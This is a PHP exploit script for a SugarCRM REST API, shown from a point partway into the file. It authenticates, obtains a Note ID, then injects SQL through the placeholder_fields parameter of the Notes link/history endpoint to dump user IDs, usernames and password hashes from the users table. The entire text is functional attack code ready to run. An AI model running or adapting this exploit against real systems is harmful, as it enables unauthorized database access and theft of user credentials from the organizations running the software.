\n"); list($url, $user, $pass) = [$argv[1], $argv[2], $argv[3]]; print "[-] Logging in with username '{$user}' and password '{$pass}'\n"; $ch = curl_init(); $login = ["username" => $user, "password" => $pass, "grant_type" => "password", "client_id" => "sugar"]; curl_setopt($ch, CURLOPT_URL, "{$url}rest/v10/oauth2/token"); curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($login)); curl_setopt($ch, CURLOPT_HTTPHEADER, ["Content-Type: application/json"]); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); if (($token = (json_decode(curl_exec($ch)))->access_token) == null) die("[-] Login failed!\n"); print "[-] Getting note ID\n"; curl_setopt($ch, CURLOPT_URL, "{$url}rest/v10/Notes"); curl_setopt($ch, CURLOPT_HTTPHEADER, ["OAuth-Token: {$token}"]); curl_setopt($ch, CURLOPT_POST, false); if (!preg_match('/"id":"([^"]+)"/', curl_exec($ch), $record)) die("[-] Note ID not found!\n"); print "[-] Executing SQL injection attack\n"; $concat = "CONCAT(id,'||',user_name,'||',user_hash)"; $sql = urlencode("AS date_modified, 'Users' AS module, {$concat} AS id FROM users WHERE 1=1 OR 1 IN (?,?,?,?,?) UNION SELECT 1,'Users',3 FROM emails WHERE ((emails.team_set_id IN (SELECT tst.team_set_id FROM team_sets_teams tst#"); $params = "module_list=Emails&placeholder_fields[Emails][{$sql}]={$sql}"; curl_setopt($ch, CURLOPT_URL, "{$url}rest/v10/Notes/{$record[1]}/link/history?{$params}"); if (($records = (json_decode(curl_exec($ch)))->records) == null) die("[-] Attack failed!\n"); print "============================================================================\n"; foreach ($records as $record) { if (count($info = explode("||", $record->id)) != 3) continue; print "[-] User ID...: {$info[0]}\n"; print "[-] Username..: {$info[1]}\n"; print "[-] Password..: {$info[2]}\n"; print "============================================================================\n"; }